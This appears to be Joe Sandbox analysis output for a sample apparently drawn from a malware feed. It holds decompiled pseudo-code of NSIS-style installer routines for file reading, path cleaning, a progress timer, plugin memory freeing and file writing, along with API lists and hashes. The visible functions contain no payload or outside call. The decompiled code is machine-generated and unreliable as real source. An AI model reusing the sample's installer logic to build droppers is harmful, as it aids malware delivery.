									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                            0x004026ec
                                                                            0x004026ee
                                                                            0x004026f1
                                                                            0x004026f3
                                                                            0x004026f6
                                                                            0x004026fb
                                                                            0x004026ff
                                                                            0x00402702
                                                                            0x00402705
                                                                            0x00402c2a
                                                                            0x00402c2d
                                                                            0x0040270b
                                                                            0x0040270b
                                                                            0x00402712
                                                                            0x00402714
                                                                            0x00402714
                                                                            0x0040271a
                                                                            0x0040287e
                                                                            0x0040287e
                                                                            0x00402881
                                                                            0x00402886
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00000000
                                                                            0x00402720
                                                                            0x00402721
                                                                            0x0040272c
                                                                            0x0040272f
                                                                            0x0040273b
                                                                            0x0040273f
                                                                            0x004027d7
                                                                            0x004027ef
                                                                            0x004027ff
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402745
                                                                            0x00402745
                                                                            0x00402748
                                                                            0x00402749
                                                                            0x0040274c
                                                                            0x00402751
                                                                            0x00402758
                                                                            0x00402760
                                                                            0x00000000
                                                                            0x00402766
                                                                            0x00402766
                                                                            0x0040276b
                                                                            0x00000000
                                                                            0x00402771
                                                                            0x00402771
                                                                            0x00402779
                                                                            0x0040277c
                                                                            0x0040277f
                                                                            0x0040283a
                                                                            0x00402841
                                                                            0x00402785
                                                                            0x0040278b
                                                                            0x00402797
                                                                            0x00402801
                                                                            0x00402801
                                                                            0x00402799
                                                                            0x00402799
                                                                            0x0040279c
                                                                            0x0040279e
                                                                            0x0040279e
                                                                            0x0040279e
                                                                            0x004027a1
                                                                            0x004027a6
                                                                            0x004027a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004027ab
                                                                            0x004027ae
                                                                            0x004027bc
                                                                            0x004027c2
                                                                            0x004027d0
                                                                            0x00000000
                                                                            0x004027d2
                                                                            0x00000000
                                                                            0x004027d2
                                                                            0x00000000
                                                                            0x004027d0
                                                                            0x0040279e
                                                                            0x00402804
                                                                            0x00402807
                                                                            0x00000000
                                                                            0x00402809
                                                                            0x0040280e
                                                                            0x0040284f
                                                                            0x00402871
                                                                            0x00402878
                                                                            0x0040285d
                                                                            0x0040285d
                                                                            0x00402860
                                                                            0x00402863
                                                                            0x00402866
                                                                            0x00402866
                                                                            0x00000000
                                                                            0x00402817
                                                                            0x00402817
                                                                            0x0040281a
                                                                            0x0040281d
                                                                            0x00402823
                                                                            0x00402827
                                                                            0x0040282a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040282a
                                                                            0x0040280e
                                                                            0x00402807
                                                                            0x0040277f
                                                                            0x0040276b
                                                                            0x00402760
                                                                            0x00000000
                                                                            0x0040282c
                                                                            0x0040282c
                                                                            0x0040282f
                                                                            0x00402838
                                                                            0x00000000
                                                                            0x0040272f
                                                                            0x0040271a
                                                                            0x00402c33
                                                                            0x00402c39

                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                            0x004067c6
                                                                            0x004067cf
                                                                            0x004067e6
                                                                            0x004067e6
                                                                            0x004067ed
                                                                            0x004067f9
                                                                            0x004067f9
                                                                            0x004067fc
                                                                            0x004067ff
                                                                            0x00406804
                                                                            0x00406806
                                                                            0x0040680f
                                                                            0x00406813
                                                                            0x00406830
                                                                            0x00406838
                                                                            0x00406838
                                                                            0x0040683d
                                                                            0x0040683f
                                                                            0x00406842
                                                                            0x00406847
                                                                            0x00406848
                                                                            0x0040684c
                                                                            0x0040684c
                                                                            0x0040684d
                                                                            0x00406854
                                                                            0x00406856
                                                                            0x0040685d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406865
                                                                            0x0040686b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040686b
                                                                            0x00406870

                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                            • CharNextW.USER32(?,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                            • CharPrevW.USER32(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2977677972
                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                            0x00404e62
                                                                            0x00404e6f
                                                                            0x00404e75
                                                                            0x00404eb3
                                                                            0x00404eb3
                                                                            0x00404ec2
                                                                            0x00404ec9
                                                                            0x00000000
                                                                            0x00404ecb
                                                                            0x00404e77
                                                                            0x00404e86
                                                                            0x00404e8e
                                                                            0x00404e91
                                                                            0x00404ea3
                                                                            0x00404ea9
                                                                            0x00404eb0
                                                                            0x00000000
                                                                            0x00404eb0
                                                                            0x00000000

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                            • GetMessagePos.USER32 ref: 00404E77
                                                                            • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0xe2df4
					_t11 =  *0x42aa24; // 0xe2df8
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                            0x00402fa3
                                                                            0x00402fb1
                                                                            0x00402fb7
                                                                            0x00402fb7
                                                                            0x00402fc5
                                                                            0x00402fc7
                                                                            0x00402fcd
                                                                            0x00402fd4
                                                                            0x00402fd6
                                                                            0x00402fd6
                                                                            0x00402fec
                                                                            0x00402ffc
                                                                            0x0040300e
                                                                            0x0040300e
                                                                            0x00403016

                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                            • MulDiv.KERNEL32(000E2DF4,00000064,000E2DF8), ref: 00402FDC
                                                                            • wsprintfW.USER32 ref: 00402FEC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E713C2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E713C12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M713C2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x713c407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x713c409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E713C1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x713c506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x713c506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x713c506c);
								goto L17;
							case 5:
								_push( *0x713c506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x713c5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E713C1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E713C1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                            0x713c265f
                                                                            0x713c2661
                                                                            0x713c2665
                                                                            0x713c2674
                                                                            0x713c2678
                                                                            0x713c267d
                                                                            0x713c267d
                                                                            0x713c2685
                                                                            0x713c268c
                                                                            0x713c2692
                                                                            0x00000000
                                                                            0x713c2699
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c26a1
                                                                            0x713c26a5
                                                                            0x713c26a8
                                                                            0x713c26ac
                                                                            0x713c26b3
                                                                            0x713c26b7
                                                                            0x713c26bd
                                                                            0x713c26bf
                                                                            0x713c26c1
                                                                            0x713c26c1
                                                                            0x713c26c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c26d1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c26d8
                                                                            0x713c26de
                                                                            0x713c26e8
                                                                            0x713c26ee
                                                                            0x713c26f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2714
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c26fa
                                                                            0x713c2700
                                                                            0x713c2701
                                                                            0x713c2703
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c271c
                                                                            0x713c271e
                                                                            0x713c2724
                                                                            0x713c272a
                                                                            0x713c272a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2692
                                                                            0x713c272d
                                                                            0x713c272d
                                                                            0x713c2732
                                                                            0x713c2743
                                                                            0x713c2743
                                                                            0x713c2749
                                                                            0x713c274e
                                                                            0x713c2753
                                                                            0x713c275f
                                                                            0x713c2764
                                                                            0x00000000
                                                                            0x713c2769
                                                                            0x713c2755
                                                                            0x713c2756
                                                                            0x713c276a
                                                                            0x713c276a
                                                                            0x713c2753
                                                                            0x713c276b
                                                                            0x713c276c
                                                                            0x713c276f
                                                                            0x713c2783

                                                                            APIs
                                                                              • Part of subcall function 713C12BB: GlobalAlloc.KERNEL32(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                            • GlobalFree.KERNEL32(?), ref: 713C2743
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C2778
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                            • Instruction ID: bdead8be0aca97e30627cb3385e843261c6cadad4254dceff9dd448b97eba86b
                                                                            • Opcode Fuzzy Hash: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                            • Instruction Fuzzy Hash: D131CB72208116EFD7168F65C9C4D2ABBBBFB86B08324452DF542832E1CB31EC199B61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                            0x00402950
                                                                            0x00402952
                                                                            0x00402957
                                                                            0x0040295c
                                                                            0x0040295f
                                                                            0x00402969
                                                                            0x0040296d
                                                                            0x0040296d
                                                                            0x00402973
                                                                            0x00402980
                                                                            0x00402988
                                                                            0x0040298b
                                                                            0x00402997
                                                                            0x0040299a
                                                                            0x004029a0
                                                                            0x004029ae
                                                                            0x004029b3
                                                                            0x004029b7
                                                                            0x004029ba
                                                                            0x004029c3
                                                                            0x004029cf
                                                                            0x004029d3
                                                                            0x004029d6
                                                                            0x004029e0
                                                                            0x004029ff
                                                                            0x004029ec
                                                                            0x004029f4
                                                                            0x004029f7
                                                                            0x004029fc
                                                                            0x004029fc
                                                                            0x00402a06
                                                                            0x00402a06
                                                                            0x00402a13
                                                                            0x00402a19
                                                                            0x00402a1f
                                                                            0x00402a1f
                                                                            0x004029b7
                                                                            0x00402a33
                                                                            0x00402a35
                                                                            0x00402a35
                                                                            0x00402a3f
                                                                            0x00402a40
                                                                            0x00402a44
                                                                            0x00402a48
                                                                            0x00402a4e
                                                                            0x00402a4e
                                                                            0x00402a55
